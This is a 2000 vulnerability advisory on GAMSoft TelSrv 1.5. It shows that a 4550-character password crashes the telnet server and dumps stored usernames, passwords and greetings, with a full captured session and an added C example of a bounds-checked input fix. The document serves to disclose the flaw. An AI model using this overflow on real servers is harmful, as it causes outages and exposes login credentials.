TelSrv Reveals Usernames & Passwords After DoS Attack

2000-07-28 00:00:00
Source: vulners.com

Details

Application: GAMSoft's TelSrv 1.5 (could be more… I don't have time to
check, nor do I have the other programs)
Problem Type: Denial of Service Attack - Reveals User Names & Passwords
Author: Patrick Webster (mailto:[email protected])
Platform: Win95 (could be more again… unable to test)
Risk Factor: High
Credibility: Patrick Webster (mailto:[email protected])
Vendor Status: Contacted, but no reply.
Vendor Website: http://www.gamsoft.com
Discovered: 20th July, 2000 (Australian)
Reported: 28th July, 2000 (Australian)


Introduction

*Note: This is my first report, so forgive me if I make any mistakes /
errors etc…

I first discovered this problem when trying to perform the Denial of Service
attack on TelSrv 1.5 which was reported not long ago. I had downloaded
TelSrv on 28 August 1999, and after playing around with it, decided I didn't
need it, thus uninstalling it and forgetting about it. When I received the
DoS report, I remembered I still had the installation, and decided to give
it a go. What was odd was that when I did it, TelSrv didn't crash; it was
working fine, prompting me for the password. I decided to try sending the
4550 characters as the password, and when I did, TelSrv crashed, sending
back a bunch of unimportant characters. At first I thought these characters
were worthless, until I noticed the message "Welcome Admin!" which was the
message to be displayed upon login by user 'admin'. I then figured that if
it displays the admin login message, it may very well display other hidden
details. I set up another account to test for this - Username: 22222,
Password: 11111. I did the crash again, and to my surprise, there, in the
bunch of junk characters, were the numbers 22222 & 11111! I tried this again,
using different names, such as a1b2c3, and when I tried the crash again, it
displayed what looked like encrypted characters (e.g. ?1u2д3, not accurate
though). With this in mind, I decided that I would find the encrypted values
of each character, by creating account names such as ABCabc123!@# and so on,
and writing a program to decrypt this.

I created a text file, which was to contain the encrypted version of the
character and a decrypted version, and while I was using 'cut & paste' to
transfer the encrypted character to the text file, I noticed that the
character had now changed to its real form. The character had changed due to
the difference between DOS characters and Windows characters (??bit - 32bit?):
the DOS characters are shown in telnet & Notepad, whereas the Windows symbols
are shown in Wordpad. This explains why the numbers were the same compared
to the letters, which were different. So basically, all you have to do is use
the DoS attack, using 4550 characters (maybe less?), copy the data which
is forced back, view it with Wordpad or the like, and simply look
through the data for any recognisable words etc. One username always seems
to be displayed after the file's path, so that is a start.


Exploit

The problem is inadequate bounds checking: when you connect to the TelSrv
Telnet server and use 4550 characters as the password, the telnet service
crashes and responds to the client with data containing TelSrv usernames,
passwords & custom login messages. This data can then be used to log in to
TelSrv. The only drawback is that the server crashes when the attack is
performed.
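The bounded-input fix for the fault described above, as an added example that is not code from TelSrv or from the advisory's author. It assumes a fixed per-field buffer (MAX_FIELD is an assumed value) and line-oriented input ending in CRLF, as a telnet login prompt receives; the over-long password is constructed inline to match the advisory's 4550-character payload.

```c
#include <stddef.h>
#include <string.h>

/* Assumed per-field limit; TelSrv's real buffer size is not in the advisory. */
#define MAX_FIELD 64

enum read_status { READ_OK = 0, READ_TOO_LONG = -1, READ_INCOMPLETE = -2 };

/* Bounded replacement for the "copy until newline" pattern the advisory calls
 * bad bounds checking. It measures the line first, rejects and consumes any
 * line that would not fit (with its NUL), and never leaves stale bytes in
 * `out`, so an over-long password can neither overwrite adjacent memory nor
 * cause adjacent memory (the user database strings seen in the crash output)
 * to be echoed back. *consumed tells the caller how much input to discard. */
int read_field(const char *in, size_t inlen, char *out, size_t outsz,
               size_t *consumed)
{
    size_t len = 0, eol;
    *consumed = 0;
    if (outsz == 0) return READ_TOO_LONG;
    while (len < inlen && in[len] != '\r' && in[len] != '\n') len++;
    if (len == inlen) { out[0] = '\0'; return READ_INCOMPLETE; } /* no EOL yet */
    eol = len + 1;
    if (in[len] == '\r' && eol < inlen && in[eol] == '\n') eol++;  /* CRLF */
    *consumed = eol;
    if (len >= outsz) { memset(out, 0, outsz); return READ_TOO_LONG; }
    memcpy(out, in, len);
    out[len] = '\0';
    return READ_OK;
}

/* Feeds a constructed password of n x 'A' plus CRLF (the advisory's payload
 * is n = 4550) through read_field. Returns the status; *stored receives the
 * length of what ended up in the field buffer, and *used the bytes consumed. */
int demo_password_of_length(size_t n, size_t *stored, size_t *used)
{
    static char line[8192];
    char field[MAX_FIELD];
    int rc;
    if (n > sizeof line - 2) n = sizeof line - 2;
    memset(line, 'A', n);
    line[n] = '\r';
    line[n + 1] = '\n';
    rc = read_field(line, n + 2, field, sizeof field, used);
    *stored = strlen(field);
    return rc;
}
```

A password of MAX_FIELD - 1 characters is the longest accepted; anything longer is discarded whole, including its line terminator, so the next read starts at the next line rather than inside the rejected one.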

Start Example:

*Note: For this example, I have created only one account, details are as
follows…

Username: 11111username11111
Password: 22222password22222
Custom Message: This is the custom greeting message!

If you look towards the end of the following output, you will see that
'11111username11111', '22222password22222' & 'This is the custom greeting
message!' are displayed. They appear in readable form here because of the
formatting of this document.

Please Wait…Connection Accepted (TelSrv 1.5)

This copy of TelSrv is not registered. Registration will remove this
message and the 5 second delay…

Username : (none, just hit enter)

Password :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*********************************************AdjustTokenPriveleges Failed :
%lu
AdjustTokenPriveleges Failed : %lu (%s)
LookupPrivilegeValue Failed : %lu
LookupPrivilegeValue Failed : %lu (%s)
SeShutdownPrivilegeOpenProcessToken Failed : %lu
OpenProcessToken Failed : %lu (%s)

Requesting shutdown priveleges…

Unknown command

Goodbye!
exitError : No priveleges for that operation
dosshutdownShutdown failed! If your host system is Windows NT,
this process does not have priveleges to shut down the system.

Shutting down…
reboothelpPassword :

Error : User database version does not match program version.Note : User
database will be converted to new version of TelSrv.Could not save user
database.No users are defined. Nobody can log in to the
server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVяяCTel
srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of
connections : %dAre you sure you want to terminate TelSrv?Cant access log
file!!Server%-25s%-25s%s
%d/%d/%d %d:%02d:%02dLogging in…%d.%d.%d.%dPlease Wait…Logged in as
"%s"Login as "%s" failedConnection terminatedFailed to stop the
server.Warning! There are active connection(s). If you stop the server now,
these connections will be terminated.

Are you sure you want to stop the server?Failed to start the server. This
can be caused by several problems :

TCP/IP is not installed on this system.
The port number is invalid.
The port number is already in use by another application.Server
ConfigurationDеI_xC§/Уќк¶ТЂkZЁ§Ш ¦@Lа@J_?µ@xCXчeюяѕДs)А75@Pxѕщ @н)eЃ°
xШ S xЂ
xр SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM
FILES\TELSRV\TELSRVS.EXE"11111username11111)kЦл,©!»п__LьмѕФнQEM™%ЋQeS\3м?T§"
НLж9!s‹РЎZPc'2ШцЁйщЂr@ЌnyмЎ+r6'g¶v5кЭу1N рП
522222password22222Й°№
К-ЫьАмЄ
ГОCA‚o1Дsьeќuќ/Х·›пODыд/УЭ]b‡О"}FпT‰Ђl7Ш }[мВ73?щ!yђ5Ц™ЏЪФћgЁ+Ф~тvOЭAoИЗїgХ
h+каЗ>‡UThis is the custom greeting
message!!?І9фD5ТЖуґмСЏЦHўІ4-СUM5GґБ$‰T/Ґ·Оa)Ђ"ьЃЌО{z$LYт«a¤ж2Ч]^
™ЌcТgќ‚ФU:=9
ЋMYrЭhVЫI„dwе.M7Т+·J·Цсp"maзЗБхнмЩЧк
вО°й‚KЈ"b/#йШІє»в@цMфyґ2Р
‹:‰8њ""Ґ5MЋ‰°;ъ>ИдwхdлйLM'7Њі'МаU8Ъ%X™€пэџСКънНЌU§(ЄЌ‰:?
ир¬ьВK5ІЧ¬{t§ъЊфdRУ№µД«$/уdТ†bX_Д/;-vXоНґ0@
иЛa¦›ґууcҐђUвПРНњ
±oa Bљ$'%§ЮQnGЖџжёoD„љЋ%Y\ћ9ј' z™Uј·Ф'€.'жЎ;
Ј‡:^РпkЙРзНM]G-…BЬx‰тG&ЮSцІ
…n¶DdьЋ>_¤t-Я}Ьu'лdдЅ$Ьr&PYгТДЖ<РЮ„Сaaaaaaaaaaaa
aaaaaaaaaaa¦иАQA-NDкчNџьC?ђiеМ|!(ј1j#™-В<зЋxѕЙЊY5!UўOТ{Щщ-W]h~ЙBѕM^oWМ'І
м›"тІф±њdъв{uхU*1LО$©бzМи}іgшerbyйв"жОwҐSд-іѕQћ§{]V®5ЎЁcЪС?%f-иєQќ5ґyFќ 8тўъџ№hqCA~(-дЎГ (\ёW:ќ%®!Ќ]ХЌ(ЭФ)б8,Fe€‚‹цI-7O?$:јхўmГh]ЩXЂ#ћ " WAћy§5±9по!Щчв>J-&®Т«Њ·Ы4h6Ц»З М†,]_b¬Хn-utv+ЪCі&тй!O Аdм9)±L)5xPЈ1„ Ф(‡?]VїI\ak·/AЅ/wЪ<6К/е 7·e‚Z§ШцTу ]ІѕЃуЮIy‚W)?ЬЋ ЏУ&ЙЫЊс }Э |ЮэґРЇм УПМ фbх¦…Н'Хк"vѕD№»…$$SЉ8‡¶3№Ћу…}ъШjе
БЛу±Ђ·/xЎіјтgаЛ6¬ёLџbМїwйЁЙ1¦cНьj-ЃbЪ-EАгgT
УіHJђљ7ы:щЁ'г(шё}cРз"ТKЌ-Q-8ЗҐЎN4џъ/C"кg-ѕd-И{УUб±&ђЭлL[»‚mГУ3НбЕ(

End Example.


Notes

Some odd things I noticed: TelSrv did NOT crash every time I performed the
operation. I also noticed that it did not always display the full username, password or whatever you're
looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed
that when using Windows95's default telnet application (telnet.exe), the information containing the
usernames etc. was not converted to its original form, whereas SecureCRT did correctly
display the data, which was what I used for this. There are quite possibly many more interesting things
people may come across; people may even wish to look into this further, maybe even figure out the
exact location where the different usernames & passwords occur (if there is any formatting in the data), or
maybe there is something else valuable in the data (other than revealing the remote path of the server, in
this case C:\PROGRAM FILES\TELSRV\).


Credibility

This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier),
not long after the known DoS attack was released. I acknowledge that I am
using the method discovered by someone else in a DoS attack, but I am
yet to receive a report of the DoS attack (being used on the password
prompt) which actually reveals the usernames & passwords of TelSrv, so I
believe no one else has discovered it yet :)


Greetings

Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza,
Chatalade and anyone else I missed…

-Pothead


Contact Information

If I really need to be contacted, you can reach me at either…
mailto:[email protected] (preferred)
or
mailto:[email protected]

Cheers from Australia :) & sorry for the length of this message.

-Patrick Webster